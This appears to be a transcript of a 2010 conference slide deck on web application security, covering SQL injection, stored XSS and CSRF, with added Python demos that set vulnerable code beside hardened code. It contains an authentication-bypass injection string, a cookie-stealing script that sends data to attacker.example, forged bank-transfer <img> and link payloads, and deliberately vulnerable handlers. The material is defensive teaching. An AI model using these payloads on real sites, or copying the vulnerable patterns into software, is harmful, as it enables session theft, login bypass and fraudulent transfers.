Is the Web at Risk?

A very short presentation held at the WIP2 workshop in Lisbon. This presentation talks about the security trends on the new WWW.

Published in: Technology

  1. is the web @ risk? World Internet Project Meeting 2010, ISCTE-IUL / SoTA / ADETTI-IUL. Carlos Serrão, Instituto Superior de Ciências do Trabalho e da Empresa, Instituto Universitário de Lisboa, School of Technology and Architecture, ADETTI-IUL. carlos.serrao@iscte.pt, carlos.j.serrao@gmail.com, http://www.carlosserrao.net, http://blog.carlosserrao.net, http://www.linkedin.com/in/carlosserrao
  2. Is the Web … … at risk? … a risk? … putting YOU at risk? WHY? HOW? WHEN?
  3. The Internet… … and the WWW, in the beginning.
  4. in the beginning... Vinton Gray Cerf, Robert Elliot Kahn … a.k.a. the “Internet fathers”
  5. The Internet was created… … as a ubiquitous … decentralized … standardized … global … interconnected … digital … communications channel.
  6. in the beginning... (Sir) Tim Berners-Lee … a.k.a. the “WWW father”
  7. The WWW was created! A system of interlinked hypertext documents accessed via the Internet. Infinite worldwide knowledge access.
  8. growth
  9. evolving, growing network (three stages of the network's evolution, left to right; slides 10 and 11 repeat the same table)
     Where the data lives: small part of the data on a specific web-site (or a limited number of web-sites) | large amounts of data on a large number of sites | data on the Cloud
     Applications: applications on the desktop | applications on the desktop and Web | applications on the Web and Cloud (more and more)
     Data on the user's device: most data is on the desktop | part of the data still on the desktop (but also mobile) | data almost nonexistent on the desktop (still on mobile)
     Data processing: data processing on the desktop | data processing on the desktop, but also on the web | data processing almost nonexistent on the user's side
  12. security++ What do we have today? Anti-virus, anti-malware, anti-spyware, firewalls, intrusion detection systems, … Are they enough?
  13. security++ YES, but… Do they protect the user from the web applications? Can a Web application be compromised to hurt legitimate users? Sure it can.
  14. security++ How? Do you trust your favorite web applications (Google, Gmail)? Do you trust your favorite social-web applications (Facebook, Twitter)? Do you trust your home banking? Do you trust your government web-sites?
  15. security++ The security perimeter has huge security holes in the application layer. [Diagram: an APPLICATION ATTACK passes straight through the Network Layer (Firewall, Hardened OS, Firewall, Web Server, App Server) into the Application Layer (Custom Developed Application Code, Legacy Systems, Web Services, Databases, Directories, Human Resources, Billing).]
  16. implications…
  17. security trends: problem types, typical problems on web apps
  18. the security risks http://www.owasp.org/index.php/Top_10
  19. security risks, considering the three most important: A1: Injection; A2: Cross Site Scripting (XSS); A5: Cross Site Request Forgery (CSRF)
  20. A1: Injection what if?
  21. A1: Injection what if? SELECT * FROM users usr WHERE usr.username = 'admin';--' AND usr.password='bb21158c733229347bd4e681891e213d94c685be' (the username field received the value admin';-- so the rest of the WHERE clause, including the password check, becomes a SQL comment and the query returns the admin row without any password)
  22. A1: Injection what if?
  23. any input from the web app user can be an attack vector
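The login check from slides 21 and 23, as an added example that is not part of the original presentation. It assumes an in-memory SQLite database with one constructed admin user; the password column holds an unsalted SHA-1 hex digest only to mirror the slide's query (unsalted SHA-1 is not a suitable password hash). The vulnerable function builds the query by string concatenation exactly as the slide shows; the safe function binds the same input as a parameter.

```python
import hashlib
import sqlite3

# Constructed sample data (not from the slides).
ADMIN_PASSWORD = "correct horse"


def make_db():
    """In-memory users table with a single admin row (constructed for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", hashlib.sha1(ADMIN_PASSWORD.encode()).hexdigest()),
    )
    return conn


def build_query_vulnerable(username, password_digest):
    """Query assembled by concatenation: user input becomes part of the SQL text."""
    return ("SELECT * FROM users usr WHERE usr.username = '" + username
            + "' AND usr.password='" + password_digest + "'")


def login_vulnerable(conn, username, password):
    """Returns the matched user row, or None. Any ' or -- in username alters the query."""
    digest = hashlib.sha1(password.encode()).hexdigest()
    # With username "admin';--" the statement becomes the one on slide 21:
    # the ';' ends the statement and '--' comments out the password check.
    return conn.execute(build_query_vulnerable(username, digest)).fetchone()


def login_safe(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL syntax."""
    digest = hashlib.sha1(password.encode()).hexdigest()
    sql = "SELECT * FROM users usr WHERE usr.username = ? AND usr.password = ?"
    return conn.execute(sql, (username, digest)).fetchone()


def demo():
    """Runs both login paths against the attacker's input and against real credentials."""
    conn = make_db()
    attacker_username = "admin';--"   # the slide's injected username
    return {
        "vulnerable_bypass": login_vulnerable(conn, attacker_username, "anything"),
        "safe_same_input": login_safe(conn, attacker_username, "anything"),
        "safe_legit": login_safe(conn, "admin", ADMIN_PASSWORD),
        "safe_wrong_password": login_safe(conn, "admin", "wrong"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(name, "->", row)
```

The parameterized version still lets the real admin in with the right password and rejects the wrong one; only the concatenated version is fooled by the quote-and-comment trick, which is the point of slide 23: every field the user controls is an attack vector unless it is treated strictly as data.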
  24. A2: Cross Site Scripting (XSS): injecting a malicious payload into the web app from the end-user side, so that it is served to other users (the victims)
  25. A2: Cross Site Scripting (XSS), application with a stored XSS vulnerability. 1. Attacker sets the trap (“update my profile”): the attacker enters a malicious script into a web page that stores the data on the server. 2. Victim views the page and sees the attacker's profile: the script runs inside the victim's browser with full access to the DOM and cookies. 3. The script silently sends the victim's session cookie to the attacker. [Diagram: application modules Knowledge Mgmt, Communication, Administration, Bus. Functions, E-Commerce, Transactions, Accounts, Finance, Custom Code.]
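The stored-profile scenario from slide 25, as an added example that is not part of the original presentation. The profile store, user names, the attacker's collection host and the session id are all constructed placeholders. It contrasts the raw rendering that lets the stored script execute (steps 2 and 3 of the slide) with output encoding for the HTML context, and shows the HttpOnly cookie flag as the server-side limit on step 3.

```python
import html

# Constructed attacker input (not from the slides): a cookie-stealing script of
# the kind step 3 of slide 25 describes. ATTACKER_HOST is a placeholder.
ATTACKER_HOST = "attacker.example"
PROFILE_PAYLOAD = ('<script>new Image().src="http://' + ATTACKER_HOST
                   + '/?c=" + document.cookie;</script>')

profiles = {}   # in-memory stand-in for the server-side profile store


def update_profile(user, about):
    """Step 1: the server stores whatever the user submitted, payload included."""
    profiles[user] = about


def render_profile_vulnerable(user):
    """Emits the stored text as HTML markup: the browser runs the stored script."""
    return "<h1>" + user + "</h1><p>" + profiles[user] + "</p>"


def render_profile_safe(user):
    """Encodes for the HTML text context: <, >, &, " and ' become entities.

    quote=True also makes the result safe inside a double- or single-quoted
    attribute value; other contexts (URLs, JavaScript, CSS) need their own encoders.
    """
    return ("<h1>" + html.escape(user, quote=True) + "</h1><p>"
            + html.escape(profiles[user], quote=True) + "</p>")


def session_cookie_header(session_id):
    """Defence in depth: HttpOnly keeps the cookie out of document.cookie, so a
    script that does run cannot read it; Secure restricts it to HTTPS."""
    return "Set-Cookie: session=" + session_id + "; HttpOnly; Secure; Path=/"


def demo():
    """Stores the attacker's profile and renders it both ways."""
    update_profile("pirate", PROFILE_PAYLOAD)
    return {
        "vulnerable": render_profile_vulnerable("pirate"),
        "safe": render_profile_safe("pirate"),
        "cookie": session_cookie_header("constructed-session-id"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The escaped page still displays the attacker's text, but as literal characters; the `<script>` element never exists in the victim's DOM. HttpOnly does not stop the script from running, it only removes the session cookie from what a running script can read, so it complements encoding rather than replacing it.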
  26. A5: Cross Site Request Forgery (CSRF): an attacker can build their own malicious website and initiate requests from the user's browser
  27. A5: Cross Site Request Forgery (CSRF), application with a CSRF vulnerability. 1. Attacker sets the trap on some website on the internet (or simply via an e-mail): a hidden <img> tag contains an attack against the vulnerable site. 2. While logged into the vulnerable site, the victim views the attacker's site. 3. The <img> tag is loaded by the browser, which sends a GET request (including credentials) to the vulnerable site; the vulnerable site sees a legitimate request from the victim and performs the requested action. [Diagram: application modules Knowledge Mgmt, Communication, Administration, Bus. Functions, Transactions, E-Commerce, Accounts, Finance, Custom Code.]
  28. A5: Cross Site Request Forgery (CSRF). Alice transfers 100€ to Bob through bank.com: POST http://bank.com/transfer.do HTTP/1.1 ... Content-Length: 19; acct=BOB&amount=100. Pirate realizes that the same bank.com web application can execute the transfer using a URL with parameters: GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1. Pirate will try to use Alice to transfer 100.000€ to his own account: http://bank.com/transfer.do?acct=MARIA&amount=100000. Pirate sends an HTML email to Alice with a URL to click: <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>; or sends an HTML email to Alice with an image to hide the attack: <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">. If Alice is authenticated at bank.com with an active session, the transfer is performed.
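The transfer.do handler from slides 27 and 28, as an added example that is not part of the original presentation. The Request class, the in-memory Bank, the balances, the attacker origin http://pirate.example and the assumption that the bank is served from http://bank.com are all constructed for the demo. The vulnerable handler authenticates by the session cookie alone, which the browser attaches to the hidden <img> request; the hardened handler requires a POST, checks the Origin header and verifies a per-session synchronizer token that the attacker's page cannot read.

```python
import secrets
from typing import Dict, Optional

# Assumption (not from the slides): the bank is served from this origin, so a
# request started by another site carries a different Origin header, or none.
BANK_ORIGIN = "http://bank.com"


class Request:
    """Minimal stand-in for what the transfer.do handler sees."""
    def __init__(self, method: str, cookies: Dict[str, str], params: Dict[str, str],
                 origin: Optional[str] = None):
        self.method = method
        self.cookies = cookies     # attached by the browser on every request to bank.com
        self.params = params       # query-string or form fields: acct, amount, csrf
        self.origin = origin       # Origin header; absent on <img>/<a> navigations


class Bank:
    def __init__(self):
        self.balances = {"ALICE": 250000, "BOB": 0, "MARIA": 0}   # constructed
        self.sessions: Dict[str, Dict[str, str]] = {}

    def login(self, user: str) -> str:
        sid = secrets.token_hex(16)
        # One unguessable CSRF token per session, embedded in the bank's own forms.
        self.sessions[sid] = {"user": user, "csrf": secrets.token_hex(16)}
        return sid

    def csrf_token(self, sid: str) -> str:
        return self.sessions[sid]["csrf"]

    def _session(self, req: Request):
        return self.sessions.get(req.cookies.get("session", ""))

    def _move(self, src: str, dst: str, amount: int) -> int:
        if amount <= 0 or dst not in self.balances or self.balances[src] < amount:
            return 400
        self.balances[src] -= amount
        self.balances[dst] += amount
        return 200

    def transfer_vulnerable(self, req: Request) -> int:
        """Slide 28's transfer.do: any method, authenticated by the cookie alone."""
        sess = self._session(req)
        if sess is None:
            return 401
        return self._move(sess["user"], req.params["acct"], int(req.params["amount"]))

    def transfer_safe(self, req: Request) -> int:
        """Same action, but only from the bank's own page with its own token."""
        sess = self._session(req)
        if sess is None:
            return 401
        if req.method != "POST":              # <img>/<a> can only produce GET
            return 405
        if req.origin != BANK_ORIGIN:         # auto-submitted cross-site forms fail here
            return 403
        if not secrets.compare_digest(req.params.get("csrf", ""), sess["csrf"]):
            return 403                        # token lives only in bank.com's pages
        return self._move(sess["user"], req.params["acct"], int(req.params["amount"]))


def demo():
    """Replays Alice's legitimate transfer and Pirate's two forged requests
    against both handlers, each on a fresh bank."""
    results = {}
    for name in ("vulnerable", "safe"):
        bank = Bank()
        alice = bank.login("ALICE")
        handler = getattr(bank, "transfer_" + name)
        legit = Request("POST", {"session": alice},
                        {"acct": "BOB", "amount": "100", "csrf": bank.csrf_token(alice)},
                        origin=BANK_ORIGIN)
        # The hidden 1x1 <img>: a GET with Alice's cookie, no Origin, no token.
        img = Request("GET", {"session": alice}, {"acct": "MARIA", "amount": "100000"})
        # A form on Pirate's site auto-submitted by script: a POST, still cookie-bearing,
        # but cross-origin and without the token.
        form = Request("POST", {"session": alice}, {"acct": "MARIA", "amount": "100000"},
                       origin="http://pirate.example")
        results[name] = {
            "legit": handler(legit),
            "img": handler(img),
            "form": handler(form),
            "balances": dict(bank.balances),
        }
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

Rejecting GET alone is not enough, which is why the forged POST is also replayed: the cookie still rides along with a cross-site form submission, and only the Origin check and the synchronizer token stop it. Marking the session cookie SameSite=Lax or Strict is a further browser-side control that keeps the cookie off such cross-site requests in the first place.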
  29. consequences This is serious!!! And we are just looking at the tip of the iceberg!
  30. [quick] conclusions: Take extra care with the web applications you trust your data to. Take extra care in the way you handle your email. Always be suspicious of anything “strange” on the web. WebApp developers, take care in what you do: your code is part of the security perimeter.